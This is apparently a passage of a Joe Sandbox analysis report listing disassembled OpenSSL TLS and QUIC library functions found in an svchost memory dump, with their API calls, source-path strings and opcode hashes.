                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_freeH_newH_set_thunksR_free$D_priv_bytes_exH_doallO_freeO_zallocR_fetchX_freeX_new
                                                                                              • String ID: AES-128-ECB$ssl\quic\quic_srtm.c
                                                                                              • API String ID: 2270308179-3908675888
                                                                                              • Opcode ID: 9d569477bdebd29a7f8aacb2b6e42e9cf91cb9ed3bcd4f9bb676f4dfa6c3972a
                                                                                              • Instruction ID: b0b26e6f92032bc462ad799f1343bf067a2a5d2131fcfa1262ef052d448a4d0c
                                                                                              • Opcode Fuzzy Hash: 9d569477bdebd29a7f8aacb2b6e42e9cf91cb9ed3bcd4f9bb676f4dfa6c3972a
                                                                                              • Instruction Fuzzy Hash: EA4121A1A1B69295FA62DB35E8612B82360BF44B84F44C036DD6D477B6EF3CE509C340
                                                                                              Function 00007FFBAB47C190 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 293COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_zalloc
                                                                                              • String ID: gfffffff$gfffffff$gfffffff$gfffffff$ssl\statem\extensions.c$tls_collect_extensions
                                                                                              • API String ID: 2822291608-844333917
                                                                                              • Opcode ID: c4cc637ee1ed934fec5b0306e0264cc1675cea91cb76cb95a093ed73c75c80bf
                                                                                              • Instruction ID: 6cf87e6560d9ab3585e611e6297c6f3133db6dbf5a97300f4b8f81eec6656162
                                                                                              • Opcode Fuzzy Hash: c4cc637ee1ed934fec5b0306e0264cc1675cea91cb76cb95a093ed73c75c80bf
                                                                                              • Instruction Fuzzy Hash: 0BC1D6B2A0E79281EB628B3AE4407B96791FF85B84F54C131DE6D436A6CF3DE485C701
                                                                                              Function 00007FFBAB431000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 123COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB43105E
                                                                                              • memcpy.VCRUNTIME140(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB43107F
                                                                                                • Part of subcall function 00007FFBAB431000: CRYPTO_free.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4310AA
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4310C7
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4310DF
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4310F0
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB431120
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB431138
                                                                                              • CRYPTO_realloc.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB431158
                                                                                              • memcpy.VCRUNTIME140(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB431187
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4311AE
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4311CE
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4311E6
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4311F7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$R_set_errormemcpy$O_freeO_mallocO_realloc
                                                                                              • String ID: SSL_CTX_use_serverinfo_ex$ssl\ssl_rsa.c
                                                                                              • API String ID: 2781819888-2805076526
                                                                                              • Opcode ID: dbbcc59e0fb2653ce460d433fd213e1ad87961e3dce96ed97a3f724f90b88252
                                                                                              • Instruction ID: 73978bbead44ac2775816b5ed1d43b632af1315fed6bcdc428f2f2cf5e26a974
                                                                                              • Opcode Fuzzy Hash: dbbcc59e0fb2653ce460d433fd213e1ad87961e3dce96ed97a3f724f90b88252
                                                                                              • Instruction Fuzzy Hash: 715196B1B0AA8281EA52DB72D8521FD6364EF84BC0F58C435ED2D477F6DE2CE5459300
                                                                                              Function 00007FFBAB41FBB0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 370stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: strncmp$R_new$R_set_debugR_set_error
                                                                                              • String ID: SECLEVEL=$STRENGTH$ssl\ssl_ciph.c$ssl_cipher_process_rulestr
                                                                                              • API String ID: 2651782980-2883399597
                                                                                              • Opcode ID: bb585ae05d445b0eaa17ed907fdf327e7f08effd77892dc8b179ba44535fb324
                                                                                              • Instruction ID: 458399887dc0493eb2769b2214c27a07b7dc79fb0f136751e5b173687b8d84a1
                                                                                              • Opcode Fuzzy Hash: bb585ae05d445b0eaa17ed907fdf327e7f08effd77892dc8b179ba44535fb324
                                                                                              • Instruction Fuzzy Hash: D1E185B2E0E24686E766CA35F45133A7791FB45B44F148036DE6D437A5DF3CE8469B00
                                                                                              Function 00007FFBAB43A8B0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 160COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EVP_PKEY_new.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43A8D5
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43A91B
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43A94B
                                                                                              • ERR_set_mark.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43A97C
                                                                                              • EVP_PKEY_set_type.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43A9EA
                                                                                              • EVP_PKEY_CTX_new_from_pkey.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AA04
                                                                                              • EVP_PKEY_CTX_free.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AA13
                                                                                              • OBJ_txt2nid.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AA9A
                                                                                              • OBJ_txt2nid.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AAB4
                                                                                              • OBJ_txt2nid.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AAC7
                                                                                              • ERR_pop_to_mark.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AAFD
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AB69
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AB7E
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AB86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: J_txt2nid$O_freeO_malloc$R_pop_to_markR_set_markX_freeX_new_from_pkeyY_freeY_newY_set_type
                                                                                              • String ID: ssl\t1_lib.c
                                                                                              • API String ID: 2333482861-1168734446
                                                                                              • Opcode ID: a0203abc5a4591652255303bf45ce65235f6d511b84468b6f80e0d53690d7b30
                                                                                              • Instruction ID: e391436339b51d543cda96c4999b7e1d9ff73ba5ca77c44f7847c666d0c20104
                                                                                              • Opcode Fuzzy Hash: a0203abc5a4591652255303bf45ce65235f6d511b84468b6f80e0d53690d7b30
                                                                                              • Instruction Fuzzy Hash: 5D719CA2A4ABD281E622DF25E5443AE73A4FB48B84F448135DEAC07765EF3CE194C700
                                                                                              Function 00007FFBAB47FC90 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 135COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_mallocR_vset_error
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_parse_stoc_alpn
                                                                                              • API String ID: 3020875438-2890585513
                                                                                              • Opcode ID: 7b209afc501ae09b01466415b08320be48d7339cdf014afa69a2f58078974435
                                                                                              • Instruction ID: ce3d6591c650b30a813468fafc46b198048465ff867bcb1ca50cde50b1b135c9
                                                                                              • Opcode Fuzzy Hash: 7b209afc501ae09b01466415b08320be48d7339cdf014afa69a2f58078974435
                                                                                              • Instruction Fuzzy Hash: A3518FA1A0AAC281EB629B31D4417BC2391EB84B84F448535DF2D4B7A6DF3DE5A1C341
                                                                                              Function 00007FFBAB49CC60 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$N_bin2bnN_is_zeroN_ucmpO_freeO_strdupR_vset_error
                                                                                              • String ID: ssl\statem\statem_srvr.c$tls_process_cke_srp
                                                                                              • API String ID: 3252685116-3145630846
                                                                                              • Opcode ID: 5bf10ccabd700325957d56873c561422542e91a143714dd2baa69b102e430cbe
                                                                                              • Instruction ID: 2746af8e897d5c7c28d9fce9731a7b6a9adc62ad3da065cf50eab46050479e7b
                                                                                              • Opcode Fuzzy Hash: 5bf10ccabd700325957d56873c561422542e91a143714dd2baa69b102e430cbe
                                                                                              • Instruction Fuzzy Hash: 614182A1B4A64281FB62AB71D8E27BD1351EF84B84F44C531DE2D477B2DE2DE5958300
                                                                                              Function 00007FFBAB435040 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 264COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$D_unlock$D_read_lockH_retrieveR_vset_errormemcmpmemcpy
                                                                                              • String ID: ssl\ssl_sess.c$ssl_get_prev_session
                                                                                              • API String ID: 2587384529-1744558562
                                                                                              • Opcode ID: de1761987cc89580968eccc00f2af673244997937e6e504fdddd4961b237f54c
                                                                                              • Instruction ID: de44568caab7373b3a6249f490beddc8976dd27eca8cc03a876ff4bb046a6579
                                                                                              • Opcode Fuzzy Hash: de1761987cc89580968eccc00f2af673244997937e6e504fdddd4961b237f54c
                                                                                              • Instruction Fuzzy Hash: 2BC185B3A0A68282EB66DB31D4997BE2360FB44B84F188131DE6E477A5DF7CE445C740
                                                                                              Function 00007FFBAB47B040 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 169COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$O_freeR_set_debug$O_strdup
                                                                                              • String ID: final_server_name$p$ssl\statem\extensions.c
                                                                                              • API String ID: 3774429508-4160180063
                                                                                              • Opcode ID: 7a8e350ca873b5178b897236a786d86059de5b1c77bc8007a1f8b38c6f7f3925
                                                                                              • Instruction ID: 06a63f0192cad6c40f0901eace25f51b67a1229a0008d7ab8e69347bc0018413
                                                                                              • Opcode Fuzzy Hash: 7a8e350ca873b5178b897236a786d86059de5b1c77bc8007a1f8b38c6f7f3925
                                                                                              • Instruction Fuzzy Hash: 09716FB2A0B68285FB639B35D4A43BD2390EB81B84F148036DE6D476B5CE3DE5C5C301
                                                                                              Function 00007FFBAB480B20 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_mallocmemcpy
                                                                                              • String ID: ssl\statem\extensions_clnt.c$ssl_next_proto_validate$tls_parse_stoc_npn
                                                                                              • API String ID: 1393888195-3563213302
                                                                                              • Opcode ID: 0321e7d9c51b55cd8405629f0ca98423d0ea0a627311ea4e9d4e6617c1bfaf81
                                                                                              • Instruction ID: 9f662d4790a50bfb2be704147b300a9ffacf781ef5e07375201a804be640143a
                                                                                              • Opcode Fuzzy Hash: 0321e7d9c51b55cd8405629f0ca98423d0ea0a627311ea4e9d4e6617c1bfaf81
                                                                                              • Instruction Fuzzy Hash: 4B51C0E1A1AB8241EB529BB1E8517B967A0EF84744F44C432EE6D437B6DF3CE585CB00
                                                                                              Function 00007FFBAB41E700 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 84COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_free$D_run_onceL_sk_findL_sk_pushO_mallocR_set_error
                                                                                              • String ID: SSL_COMP_add_compression_method$ssl\ssl_ciph.c
                                                                                              • API String ID: 2747923163-4252575135
                                                                                              • Opcode ID: 2608b874bdf970e33d35009282d8f2afa5c6041aa4f20bfb7062e935cf2445e9
                                                                                              • Instruction ID: 452645875c0202a9629ac95cbab7882ab80a1ea047398d709d04c4ef67a7c292
                                                                                              • Opcode Fuzzy Hash: 2608b874bdf970e33d35009282d8f2afa5c6041aa4f20bfb7062e935cf2445e9
                                                                                              • Instruction Fuzzy Hash: D431ADA8E5B61341FA669732E8922BD1B54EF44780F44C436ED7D476B6DE2CE9098300
                                                                                              Function 00007FFBAB41D010 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D04E
                                                                                              • X509_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D07A
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D086
                                                                                              • OSSL_STACK_OF_X509_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D093
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D0AD
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D0E2
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D0F8
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D10E
                                                                                              • X509_STORE_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D117
                                                                                              • X509_STORE_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D120
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D145
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D15B
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423B73,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB41D170
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$E_freeX509_X509_freeY_free
                                                                                              • String ID: ssl\ssl_cert.c
                                                                                              • API String ID: 1233721043-188639428
                                                                                              • Opcode ID: 505530dc6204a26c7951dd06b761be4010829963c1e1916f816e13e1b3343860
                                                                                              • Instruction ID: 8d65d528dd1cfa5cd4c5726e778332143abd7980ef730ddab3e6aca73fe00250
                                                                                              • Opcode Fuzzy Hash: 505530dc6204a26c7951dd06b761be4010829963c1e1916f816e13e1b3343860
                                                                                              • Instruction Fuzzy Hash: 17415EB1B5AA5281EB21DF36D8821BC2724FB85B94F009035DE6D577A6CF3CE565C304
                                                                                              Function 00007FFBAB418C60 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$Y_free$L_sk_pop_freeO_clear_freememset
                                                                                              • String ID: ssl\s3_lib.c
                                                                                              • API String ID: 4031674668-3639828702
                                                                                              • Opcode ID: 56749a7fe6fc518fbc9008921f35fdd5fde7fc96ec0f361e55d887f79028f0f3
                                                                                              • Instruction ID: 6a579c09683262977ecc33634d67b897e9f5814351c74ffb82b062ea257aa641
                                                                                              • Opcode Fuzzy Hash: 56749a7fe6fc518fbc9008921f35fdd5fde7fc96ec0f361e55d887f79028f0f3
                                                                                              • Instruction Fuzzy Hash: E0415CF1B5A64391EB12EB72D4923BD2310FF95B88F448436DE2D4B2A6CE6DE1048321
                                                                                              Function 00007FFBAB458350 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 357COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_ctrl$R_family$R_clearR_newR_set_debugR_vset_error
                                                                                              • String ID: ensure_channel_started$failed to configure channel$failed to start assist thread$failed to start channel$quic_do_handshake$ssl\quic\quic_impl.c
